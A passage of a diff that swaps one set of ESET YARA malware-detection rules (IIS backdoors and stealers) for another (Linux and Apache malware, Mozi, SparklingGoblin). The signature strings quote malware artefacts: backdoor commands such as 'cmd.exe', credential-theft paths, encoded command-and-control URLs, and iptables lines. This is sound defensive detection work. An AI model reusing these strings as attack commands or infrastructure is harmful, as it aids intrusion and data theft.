// add rdx, 4 + 48 (81 FA | 3D ) ?? ?? ?? ?? // cmp rdx, _size + 75 D? // jnz short _begin + } + $32 = { + 69 C9 6D 4E C6 41 // imul ecx, 41C64E6Dh + 8B B4 1A ?? ?? ?? ?? // mov esi, [edx+ebx+_data] + 81 C1 39 30 00 00 // add ecx, 12345 + 31 CE // xor esi, ecx + 89 34 10 // mov [eax+edx], esi + 83 C2 04 // add edx, 4 + 81 FA ?? ?? ?? ?? // cmp edx, _size + 75 DD // jnz short loc_69A5 + } condition: - ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) + any of them } -import "pe" - -rule ESET_IIS_Group04_Rgdoor +rule ESET_Onimiki : LINUX_ONIMIKI { meta: - description = "Detects Group 4 native IIS malware family (RGDoor)" - author = "ESET Research" - id = "64a0e664-a4d9-555b-a11b-5f7d9d0678b1" - date = "2021-08-04" - modified = "2021-08-04" + description = "Linux/Onimiki malicious DNS server" + author = "Olivier Bilodeau " + id = "3a99799f-fbb4-5fee-a796-3310acd10e17" + date = "2014-02-06" + modified = "2014-04-04" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L178-L199" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "be615dc0cc8bf0fd52cc5a88a3759c1cb1cd18703de74d16f5cce3eabccf91c6" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/windigo/windigo-onimiki.yar#L32-L59" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "eac30f5c9a9606d1d0e14c55e0532c54976fbb0d2e4f5cd2d9f719b77e07161a" score = 75 quality = 80 - tags = "" + tags = "LINUX/ONIMIKI" + malware = "Linux/Onimiki" + operation = "Windigo" + contact = "windigo@eset.sk" license = "BSD 2-Clause" - version = "1" strings: - $i1 = "RGSESSIONID=" - $s2 = "upload$" - $s3 = "download$" - $s4 = "cmd$" - $s5 = "cmd.exe" + $a1 = {43 0F B6 74 2A 0E 43 0F B6 0C 2A 8D 7C 3D 00 8D} + $a2 = {74 35 00 8D 4C 0D 00 89 F8 41 F7 E3 89 F8 29 D0} + $a3 = {D1 E8 01 C2 89 F0 C1 EA 04 44 8D 0C 92 46 8D 0C} + $a4 = {8A 41 F7 E3 89 F0 44 29 CF 29 D0 D1 E8 01 C2 89} + $a5 = {C8 C1 EA 04 44 8D 04 92 46 8D 04 82 41 F7 E3 89} + $a6 = {C8 44 29 C6 29 D0 D1 E8 01 C2 C1 EA 04 8D 04 92} + $a7 = {8D 04 82 29 C1 42 0F B6 04 21 42 88 84 14 C0 01} + $a8 = {00 00 42 0F B6 04 27 43 88 04 32 42 0F B6 04 26} + $a9 = {42 88 84 14 A0 01 00 00 49 83 C2 01 49 83 FA 07} condition: - ESET_IIS_Native_Module_PRIVATE and ($i1 or all of ($s*)) + all of them } -import "pe" +import "elf" -rule ESET_IIS_Group05_Iistealer +rule ESET_Helimodproxy { meta: - description = "Detects Group 5 native IIS malware family (IIStealer)" - author = "ESET Research" - id = "598ec6b2-0349-5da7-acad-72ef2468b927" - date = "2021-08-04" - modified = "2021-08-04" + description = "HelimodProxy malicious Apache module" + author = "ESET, spol. s r.o." + id = "8c05bd0b-9645-580c-ac80-58e45b2a8884" + date = "2024-04-27" + modified = "2024-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L201-L232" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "5dff445121fda59df805d6fcb5db3f8f8e52a6e63e2da2a6875f8c9ad9cafc72" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/windigo/helimod.yar#L32-L54" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "e39667aa137e315bc26eaef791ccab52938fd809" + logic_hash = "9e3d57add1042eff41b42f0c8d46ed37af4092d5af4d4b2088b07992a4649bc2" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" - version = "1" + version = 1 strings: - $s1 = "tojLrGzFMbcDTKcH" ascii wide - $s2 = "4vUOj3IutgtrpVwh" ascii wide - $s3 = "SoUnRCxgREXMu9bM" ascii wide - $s4 = "9Zr1Z78OkgaXj1Xr" ascii wide - $s5 = "cache.txt" ascii wide - $s6 = "/checkout/checkout.aspx" ascii wide - $s7 = "/checkout/Payment.aspx" ascii wide - $s8 = "/privacy.aspx" - $s9 = "X-IIS-Data" - $s10 = "POST" - $s11 = {C7 ?? CF 2F 00 63 00 C7 ?? D3 68 00 65 00 C7 ?? D7 63 00 6B 00 C7 ?? DB 6F 00 75 00 C7 ?? DF 74 00 2F 00 C7 ?? E3 63 00 68 00 C7 ?? E7 65 00 63 00 C7 ?? EB 6B 00 6F 00 C7 ?? EF 75 00 74 00 C7 ?? F3 2E 00 61 00 C7 ?? F7 73 00 70 00 C7 ?? FB 78 00 00 00} - $s12 = {C7 ?? AF 2F 00 70 00 C7 ?? B3 72 00 69 00 C7 ?? B7 76 00 61 00 C7 ?? BB 63 00 79 00 C7 ?? BF 2E 00 61 00 C7 ?? C3 73 00 70 00 C7 ?? C7 78 00 00 00} + $1 = "secret\x00%s:%u" + $2 = "/%s/%s/%s%s" + $3 = "ad\x00pmt" + $4 = "mod_dir.c" + $5 = "pmtad" condition: - ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) + ESET_Apachemodule_PRIVATE and ($1 or ($2 and $3) or ($4 and $5)) } -import "pe" +import "elf" -rule ESET_IIS_Group06_ISN +rule ESET_Helimodredirect { meta: - description = "Detects Group 6 native IIS malware family (ISN)" - author = "ESET Research" - id = "1f68fc42-61a3-5a7d-9daa-31ae3b561837" - date = "2021-08-04" - modified = "2021-08-04" + description = "HelimodRedirect malicious Apache module" + author = "ESET, spol. s r.o." + id = "d8fe674d-8895-5501-b2e3-f74c386e10f0" + date = "2024-04-27" + modified = "2024-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L234-L259" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "2f59034a642a9b92fc88922433cd5923be02332159cba5e16d99d9523ed43205" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/windigo/helimod.yar#L56-L79" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "e39667aa137e315bc26eaef791ccab52938fd809" + logic_hash = "1a85cae7ee354e5d96e88781b4e0a49757016d8b64dfb80c07a13b36bf9091e2" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" - version = "1" + version = 1 strings: - $s1 = "isn7 config reloaded" - $s2 = "isn7 config NOT reloaded, not found or empty" - $s3 = "isn7 log deleted" - $s4 = "isn7 log not deleted, ERROR 0x%X" - $s5 = "isn7 log NOT found" - $s6 = "isn_reloadconfig" - $s7 = "D:\\soft\\Programming\\C++\\projects\\isapi\\isn7" - $s8 = "get POST failed %d" - $s9 = "isn7.dll" + $h1 = "secret\x00%s:%" + $h2 = "$!%#!$" + $h3 = "mod_security2.c" + $r1 = "%s?DOM=%s&URI=%s" + $r2 = "REDIRECT_URL" condition: - ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) + ESET_Apachemodule_PRIVATE and any of ($h*) and any of ($r*) } -import "pe" +import "elf" -rule ESET_IIS_Group07_Iispy +rule ESET_Helimodsteal { meta: - description = "Detects Group 7 native IIS malware family (IISpy)" - author = "ESET Research" - id = "64ed0189-a0be-5592-b9c6-1622700a7ed7" - date = "2021-08-04" - modified = "2021-08-04" + description = "HelimodSteal malicious Apache module" + author = "ESET, spol. s r.o." + id = "7b080f21-d6e3-5dda-bfd9-fb9d82fbb98e" + date = "2024-04-27" + modified = "2024-04-27" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L261-L296" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "ec5db5f36d06f9b0bdfe598fc72431da35afc1473dcc29f437a0f48ea9835a03" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/windigo/helimod.yar#L81-L105" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "e39667aa137e315bc26eaef791ccab52938fd809" + logic_hash = "9c0a5842dc986fec667fc7d7ad9d0c63b89b4a5ec87c9c9b72574ca5b15df928" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" - version = "1" + version = 2 strings: - $s1 = "/credential/username" - $s2 = "/credential/password" - $s3 = "/computer/domain" - $s4 = "/computer/name" - $s5 = "/password" - $s6 = "/cmd" - $s7 = "%.8s%.8s=%.8s%.16s%.8s%.16s" - $s8 = "ImpersonateLoggedOnUser" - $s9 = "WNetAddConnection2W" - $t1 = "X-Forwarded-Proto" - $t2 = "Sec-Fetch-Mode" - $t3 = "Sec-Fetch-Site" - $t4 = "Cookie" - $t5 = {49 45 4E 44 AE 42 60 82} - $t6 = {89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52} + $h1 = "secret\x00%s:%" + $h2 = "$!%#!$" + $h3 = "mod_security2.c" + $s1 = "p0sT5n1F3r" + $s2 = "ENGINE_ON" + $s3 = "POST /" condition: - ESET_IIS_Native_Module_PRIVATE and 2 of ($s*) and any of ($t*) + ESET_Apachemodule_PRIVATE and any of ($h*) and any of ($s*) } -import "pe" - -rule ESET_IIS_Group08 +rule ESET_Linux_Rakos { meta: - description = "Detects Group 8 native IIS malware family" - author = "ESET Research" - id = "d0e9a5ec-b7f0-5d3f-93b4-d048503eb210" - date = "2021-08-04" - modified = "2021-08-04" - reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L298-L337" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "d5826d454d25ecbbb5da464da974023a247517d873cf10dc0eafa91e185451da" + description = "Linux/Rakos.A executable" + author = "Peter Kálnai" + id = "3c15401a-22c1-59e2-a979-1f9a6a990ae0" + date = "2016-12-13" + modified = "2016-12-19" + reference = "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/rakos/rakos.yar#L33-L53" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "79a02ada56bf75c5f178b58822eb905977cace3483453ea8cf4dfc32f6b6c30d" score = 75 - quality = 53 + quality = 80 tags = "" - license = "BSD 2-Clause" version = "1" + contact = "threatintel@eset.com" + license = "BSD 2-Clause" strings: - $i1 = "FliterSecurity.dll" - $i2 = "IIS7NativeModule.dll" - $i3 = "Ver1.0." - $s1 = "Cmd" - $s2 = "Realy path : %s" - $s3 = "Logged On Users : %d" - $s4 = "Connect OK!" - $s5 = "You are fucked!" - $s6 = "Shit!Error" - $s7 = "Where is the God!!" - $s8 = "Shit!Download False!" - $s9 = "Good!Run OK!" - $s10 = "Shit!Run False!" - $s11 = "Good!Download OK!" - $s12 = "[%d]safedog" - $s13 = "ed81bfc09d069121" - $s14 = "a9478ef01967d190" - $s15 = "af964b7479e5aea2" - $s16 = "1f9e6526bea65b59" - $s17 = "2b9e9de34f782d31" - $s18 = "33cc5da72ac9d7bb" - $s19 = "b1d71f4c2596cd55" - $s20 = "101fb9d9e86d9e6c" + $ = "upgrade/vars.yaml" + $ = "MUTTER" + $ = "/tmp/.javaxxx" + $ = "uckmydi" condition: - ESET_IIS_Native_Module_PRIVATE and 1 of ($i*) and 3 of ($s*) + 3 of them } -import "pe" - -rule ESET_IIS_Group09 +rule ESET_Mozi_Killswitch : FILE { meta: - description = "Detects Group 9 native IIS malware family" - author = "ESET Research" - id = "69d176bc-73b1-5c4d-bb7e-463d26e8e6a9" - date = "2021-08-04" - modified = "2021-08-04" + description = "Mozi botnet kill switch" + author = "Ivan Besina" + id = "e3d34ae0-de06-5ff4-b44b-44d264b6dd29" + date = "2023-09-29" + modified = "2023-10-31" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L339-L387" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "5f89f9488221b8db8d493b3c23b7f5edd957c15511148eca890558886c128192" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/mozi/mozi.yar#L32-L51" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + logic_hash = "90eaed2f7f5595b145b2678a46ef6179082192215369fa9235024b0ce1574a49" score = 75 - quality = 76 - tags = "" + quality = 80 + tags = "FILE" license = "BSD 2-Clause" version = "1" strings: - $i1 = "FliterSecurity.dll" - $i2 = {56565656565656565656565656565656} - $i3 = "app|hot|alp|svf|fkj|mry|poc|doc|20" xor - $i4 = "yisouspider|yisou|soso|sogou|m.sogou|sogo|sogou|so.com|baidu|bing|360" xor - $i5 = "baidu|m.baidu|soso|sogou|m.sogou|sogo|sogou|so.com|google|youdao" xor - $i6 = "118|abc|1go|evk" xor - $s1 = "AVCFuckHttpModuleFactory" - $s2 = "X-Forward" - $s3 = "fuck32.dat" - $s4 = "fuck64.dat" - $s5 = "&ipzz1=" - $s6 = "&ipzz2=" - $s7 = "&uuu=" - $s8 = "http://20.3323sf.c" xor - $s9 = "http://bj.whtjz.c" xor - $s10 = "http://bj2.wzrpx.c" xor - $s11 = "http://cs.whtjz.c" xor - $s12 = "http://df.e652.c" xor - $s13 = "http://dfcp.yyphw.c" xor - $s14 = "http://es.csdsx.c" xor - $s15 = "http://hz.wzrpx.c" xor - $s16 = "http://id.3323sf.c" xor - $s17 = "http://qp.008php.c" xor - $s18 = "http://qp.nmnsw.c" xor - $s19 = "http://sc.300bt.c" xor - $s20 = "http://sc.wzrpx.c" xor - $s21 = "http://sf2223.c" xor - $s22 = "http://sx.cmdxb.c" xor - $s23 = "http://sz.ycfhx.c" xor - $s24 = "http://xpq.0660sf.c" xor - $s25 = "http://xsc.b1174.c" xor + $iptables1 = "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" + $iptables2 = "iptables -I OUTPUT -p tcp --sport 30005 -j DROP" + $haha = "/haha" + $networks = "/usr/networks" condition: - ESET_IIS_Native_Module_PRIVATE and any of ($i*) and 3 of ($s*) + all of them and filesize <500KB } import "pe" -rule ESET_IIS_Group10 +rule ESET_Sparklinggoblin_Chacha20Loader_Richheader { meta: - description = "Detects Group 10 native IIS malware family" + description = "Rule matching ChaCha20 loaders rich header" author = "ESET Research" - id = "31368b38-9128-594d-888d-e97d3edc7a1f" - date = "2021-08-04" - modified = "2021-08-04" + id = "e1dac369-f25e-5cb3-aafa-b0c45f05b295" + date = "2021-03-30" + modified = "2021-08-26" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L389-L423" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "48701168d7da726222227ef757f1a4005a49c0bf300123319ce03db09445b3ef" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/sparklinggoblin/SparklingGoblin.yar#L33-L57" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "09ffe37a54bc4ebebd8d56098e4c76232f35d821" + hash = "29b147b76bb0d9e09f7297487cb972e6a2905586" + hash = "33f2c3de2457b758fc5824a2b253ad7c7c2e9e37" + hash = "45bef297ce78521eac6ee39e7603e18360e67c5a" + hash = "4cec7cdc78d95c70555a153963064f216dae8799" + hash = "4d4c1a062a0390b20732ba4d65317827f2339b80" + hash = "4f6949a4906b834e83ff951e135e0850fe49d5e4" + logic_hash = "a5c9595036dec0e0aef0a030c590189752217d15d3f53bf3dc537f5b43fae63e" score = 75 quality = 80 tags = "" license = "BSD 2-Clause" - version = "1" - - strings: - $s1 = "IIS7.dll" - $s2 = "(.*?)title(.*?)>" - $s3 = "<meta(.*?)name(.*?)=(.*?)keywords(.*?)>" - $s4 = "<meta(.*?)name(.*?)=(.*?)description(.*?)>" - $s5 = "js.breakavs.co" - $s6 = "微信群-赛车PK10群【进群微信fun57644】_幸运飞艇_幸运28群" - $s7 = "北京赛车微信群,北京微信赛车群,北京赛车微信群,PK10群,北京赛车pk10微信群,PK10微信群,赛车微信群,北京赛车群," - $s8 = "北京赛车微信群,北京微信赛车群【进群微信号fun57644】北京微信赛车群,北京微信赛车" - $e1 = "Baiduspider" - $e2 = "Sosospider" - $e3 = "Sogou web spider" - $e4 = "360Spider" - $e5 = "YisouSpider" - $e6 = "sogou.com" - $e7 = "soso.com" - $e8 = "uc.cn" - $e9 = "baidu.com" - $e10 = "sm.cn" condition: - ESET_IIS_Native_Module_PRIVATE and 2 of ($e*) and 3 of ($s*) + pe.rich_signature.length>=104 and pe.rich_signature.length<=112 and pe.rich_signature.toolid(241,40116)>=5 and pe.rich_signature.toolid(241,40116)<=10 and pe.rich_signature.toolid(147,30729)==11 and pe.rich_signature.toolid(264,24215)>=15 and pe.rich_signature.toolid(264,24215)<=16 } import "pe" -rule ESET_IIS_Group11 +rule ESET_Sparklinggoblin_Chacha20 : FILE { meta: - description = "Detects Group 11 native IIS malware family" + description = "SparklingGoblin ChaCha20 implementations" author = "ESET Research" - id = "e9dac67a-1675-5198-ad26-d555696844f9" - date = "2021-08-04" - modified = "2021-08-04" + id = "c0caceca-f685-5786-82f6-3ab7435f8061" + date = "2021-05-20" + modified = "2021-08-26" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L425-L455" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "a67b6b49b5fc2c7f260c06201c59478f5472de63091c510af82d526c410abb0c" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/sparklinggoblin/SparklingGoblin.yar#L59-L368" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b" + hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f" + hash = "8be6d5f040d0085c62b1459afc627707b0de89cf" + hash = "4668302969fe122874fb2447a80378dcb671c86b" + hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b" + hash = "9ce7650f2c08c391a35d69956e171932d116b8bd" + hash = "91b32e030a1f286e7d502ca17e107d4bfbd7394a" + logic_hash = "b742bc22e0ebbce40607cb109b4d6fb03a40c1fb223c8092d93346dd3dd22789" score = 75 quality = 80 - tags = "" + tags = "FILE" license = "BSD 2-Clause" - version = "1" strings: - $s1 = "DnsQuery_A" - $s2 = "&reurl=" - $s3 = "&jump=1" - $s4 = "JVVRaeof" - $s5 = "ncpmg::0" - $s6 = "zkpzz0cnnuqwnw0eqo" - $s7 = "jvvr<11yyy0cnnuqwnw0eqo130rjrAeofqwv?" + $chunk_1 = { + 8B 4D ?? + 56 + 8B 75 ?? + 57 + 8B 7D ?? + 8B 04 BB + 01 04 93 + 8B 04 B3 + 33 04 93 + C1 C0 10 + 89 04 B3 + 01 04 8B + 8B 04 BB + 33 04 8B + C1 C0 0C + 89 04 BB + 01 04 93 + 8B 04 B3 + 33 04 93 + C1 C0 08 + 89 04 B3 + 01 04 8B + 8B 04 BB + 33 04 8B + C1 C0 07 + 89 04 BB + } + $chunk_2 = { + 03 4D ?? + 44 03 C0 + 03 55 ?? + 33 F1 + 45 33 D8 + C1 C6 10 + 44 33 F2 + 41 C1 C3 10 + 41 03 FB + 41 C1 C6 10 + 45 03 E6 + 41 03 DA + 44 33 CB + 44 03 EE + 41 C1 C1 10 + 8B C7 + 33 45 ?? + 45 03 F9 + C1 C0 0C + 44 03 C0 + 45 33 D8 + 44 89 45 ?? + 41 C1 C3 08 + 41 03 FB + 44 8B C7 + 44 33 C0 + 41 8B C5 + 33 45 ?? + C1 C0 0C + 03 C8 + 41 C1 C0 07 + 33 F1 + 89 4D ?? + C1 C6 08 + 44 03 EE + 41 8B CD + 33 C8 + 41 8B C4 + 33 45 ?? + C1 C0 0C + 03 D0 + C1 C1 07 + 44 33 F2 + 89 55 ?? + 41 C1 C6 08 + 45 03 E6 + 41 8B D4 + 33 D0 + 41 8B C7 + 41 33 C2 + C1 C2 07 + C1 C0 0C + 03 D8 + 44 33 CB + 41 C1 C1 08 + 45 03 F9 + 45 8B D7 + 44 33 D0 + 8B 45 ?? + 03 C1 + 41 C1 C2 07 + 44 33 C8 + 89 45 ?? + 41 C1 C1 10 + 45 03 E1 + 41 8B C4 + 33 C1 + 8B 4D ?? + C1 C0 0C + 03 C8 + 44 33 C9 + 89 4D ?? + 89 4D ?? + 41 C1 C1 08 + 45 03 E1 + 41 8B CC + 33 C8 + 8B 45 ?? + C1 C1 07 + 89 4D ?? + 89 4D ?? + 03 C2 + 41 03 D8 + 89 45 ?? + 41 33 C3 + C1 C0 10 + 44 03 F8 + 41 8B CF + 33 CA + 8B 55 ?? + } + $chunk_3 = { + C7 45 ?? 65 78 70 61 + 4C 8D 45 ?? + C7 45 ?? 6E 64 20 33 + 4D 8B F9 + C7 45 ?? 32 2D 62 79 + 4C 2B C1 + C7 45 ?? 74 65 20 6B + } + $chunk_4 = { + 0F B6 02 + 0F B6 4A ?? + C1 E1 08 + 0B C8 + 0F B6 42 ?? + C1 E1 08 + 0B C8 + 0F B6 42 ?? + C1 E1 08 + 0B C8 + 41 89 0C 10 + 48 8D 52 ?? + 49 83 E9 01 + } + $chunk_5 = { + 03 4D ?? + 44 03 C0 + 03 55 ?? + 33 F1 + 41 33 F8 + C1 C6 10 + 44 33 F2 + C1 C7 10 + 44 03 DF + 41 C1 C6 10 + 45 03 E6 + 44 03 CB + 45 33 D1 + 44 03 EE + 41 C1 C2 10 + 41 8B C3 + 33 45 ?? + 45 03 FA + C1 C0 0C + 44 03 C0 + 41 33 F8 + 44 89 45 ?? + C1 C7 08 + 44 03 DF + 45 8B C3 + 44 33 C0 + 41 8B C5 + 33 45 ?? + C1 C0 0C + 03 C8 + 41 C1 C0 07 + 33 F1 + 89 4D ?? + C1 C6 08 + 44 03 EE + 41 8B CD + 33 C8 + 41 8B C4 + 33 45 ?? + C1 C0 0C + 03 D0 + C1 C1 07 + 44 33 F2 + 89 55 ?? + 41 C1 C6 08 + 45 03 E6 + 41 8B D4 + 33 D0 + 41 8B C7 + 33 C3 + C1 C2 07 + C1 C0 0C + 44 03 C8 + 45 33 D1 + 41 C1 C2 08 + 45 03 FA + 41 8B DF + 33 D8 + 8B 45 ?? + 03 C1 + C1 C3 07 + 44 33 D0 + 89 45 ?? + 41 C1 C2 10 + 45 03 E2 + 41 8B C4 + 33 C1 + 8B 4D ?? + C1 C0 0C + 03 C8 + 44 33 D1 + 89 4D ?? + 89 4D ?? + 41 C1 C2 08 + 45 03 E2 + 41 8B CC + 33 C8 + 8B 45 ?? + C1 C1 07 + 89 4D ?? + 89 4D ?? + 03 C2 + 45 03 C8 + 89 45 ?? + 33 C7 + C1 C0 10 + 44 03 F8 + 41 8B CF + 33 CA + 8B 55 ?? + C1 C1 0C + 03 D1 + 8B FA + 89 55 ?? + 33 F8 + 89 55 ?? + 8B 55 ?? + 03 D3 + C1 C7 08 + 44 03 FF + 41 8B C7 + 33 C1 + C1 C0 07 + 89 45 ?? + 89 45 ?? + 8B C2 + 33 C6 + C1 C0 10 + 44 03 D8 + 41 33 DB + C1 C3 0C + 03 D3 + 8B F2 + 89 55 ?? + 33 F0 + 41 8B C1 + 41 33 C6 + C1 C6 08 + C1 C0 10 + 44 03 DE + 44 03 E8 + 41 33 DB + 41 8B CD + C1 C3 07 + 41 33 C8 + 44 8B 45 ?? + C1 C1 0C + 44 03 C9 + 45 8B F1 + 44 33 F0 + 41 C1 C6 08 + 45 03 EE + 41 8B C5 + 33 C1 + 8B 4D ?? + C1 C0 07 + } condition: - ESET_IIS_Native_Module_PRIVATE and 3 of ($s*) + any of them and filesize <450KB } import "pe" -rule ESET_IIS_Group12 +rule ESET_Sparklinggoblin_Etweventwrite { meta: - description = "Detects Group 12 native IIS malware family" + description = "SparklingGoblin EtwEventWrite patching" author = "ESET Research" - id = "7278f2df-d18a-5d95-9c21-37906629a7f0" - date = "2021-08-04" - modified = "2021-08-04" + id = "27b36ee1-a98c-5174-a156-8e0b0d0a58cd" + date = "2021-05-20" + modified = "2021-08-26" reference = "https://github.com/eset/malware-ioc/" - source_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/badiis/badiis.yar#L457-L495" - license_url = "https://github.com/eset/malware-ioc/blob/9b299fc90dc027a039652a8a4ac487ade0a381dd/LICENSE" - logic_hash = "8da03328e3702aff8ea5de77fc220f326030c31972d27c0bd9b5918dca550aba" + source_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/sparklinggoblin/SparklingGoblin.yar#L370-L463" + license_url = "https://github.com/eset/malware-ioc/blob/5cca240b5eb0860e011164b35b343cb84059bf02/LICENSE" + hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b" + hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f" + hash = "8be6d5f040d0085c62b1459afc627707b0de89cf" + hash = "4668302969fe122874fb2447a80378dcb671c86b" + hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b" + hash = "9ce7650f2c08c391a35d69956e171932d116b8bd" + logic_hash = "45615dcc5302392c18052818071623a9d1a1008c460bdb24a4acfb4300356c6b" score = 75 - quality = 78 + quality = 80 tags = "" license = "BSD 2-Clause" - version = "1" strings: - $s1 = "C:\\inetpub\\temp\\IIS Temporary Compressed Files\\" - $s2 = "F5XFFHttpModule.dll" - $s3 = "gtest_redir" - $s4 = "\\cmd.exe" nocase - $s5 = "iuuq;00" - $s6 = "?xhost=" - $s7 = "&reurl=" - $s8 = "?jump=1" - $s9 = "app|zqb" - $s10 = "ifeng|ivc|sogou|so.com|baidu|google|youdao|yahoo|bing|118114|biso|gougou|sooule|360|sm|uc" - $s11 = "sogou|so.com|baidu|google|youdao|yahoo|bing|gougou|sooule|360|sm.cn|uc" - $s12 = "Hotcss/|Hotjs/" - $s13 = "HotImg/|HotPic/" - $s14 = "msf connect error !!" - $s15 = "download ok !!" - $s16 = "download error !! " - $s17 = "param error !!" - $s18 = "Real Path: " - $s19 = "unknown cmd !" - $b1 = {15 BD 01 2E [-] 5E 40 08 97 [-] CF 8C BE 30 [-] 28 42 C6 3B} - $b2 = {E1 0A DC 39 [-] 49 BA 59 AB [-] BE 56 E0 57 [-] F2 0F 88 3E} + $chunk_1 = { + 48 8D 0D ?? ?? ?? ?? + C7 44 24 ?? 48 31 C0 C3 + FF 15 ?? ?? ?? ?? + 48 8B C8 + 48 8D 15 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? + 83 64 24 ?? 00 + 4C 8D 4C 24 ?? + BF 04 00 00 00 + 48 8B C8 + 8B D7 + 48 8B D8 + 44 8D 47 ?? + FF 15 ?? ?? ?? ?? + 44 8B C7 + 48 8D 54 24 ?? + 48 8B CB + E8 ?? ?? ?? ?? + 44 8B 44 24 ?? + 4C 8D 4C 24 ?? + 8B D7 + 48 8B CB + FF 15 ?? ?? ?? ?? + 48 8B 05 ?? ?? ?? ?? + } + $chunk_2 = { + 55 + 8B EC + 51 + 51 + 57 + 68 08 1A 41 00 + 66 C7 45 ?? C2 14 + C6 45 ?? 00 + FF 15 ?? ?? ?? ?? + 68 10 1A 41 00 + 50 + FF 15 ?? ?? ?? ?? + 83 65 ?? 00 + 8B F8 + 8D 45 ?? + 50 + 6A 40 + 6A 03 + 57 + FF 15 ?? ?? ?? ?? + 6A 03 + 8D 45 ?? + 50 + 57 + E8 ?? ?? ?? ?? + 83 C4 0C + 8D 45 ?? + 50 + FF 75 ?? + 6A 03 + 57 + FF 15 ?? ?? ?? ?? + } + $chunk_3 = { + 48 8D 0D ?? ?? ?? ?? + C7 44 24 ?? 48 31 C0 C3 + FF 15 ?? ?? ?? ?? + 48 8B C8 + 48 8D 15 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? + } condition: - ESET_IIS_Native_Module_PRIVATE and 5 of them + any of them } import "pe" -rule ESET_IIS_Group13_Iiserpent +rule ESET_Sparklinggoblin_Mutex { meta: - description = "Detects Group 13 native IIS malware family (IISerpent)" + 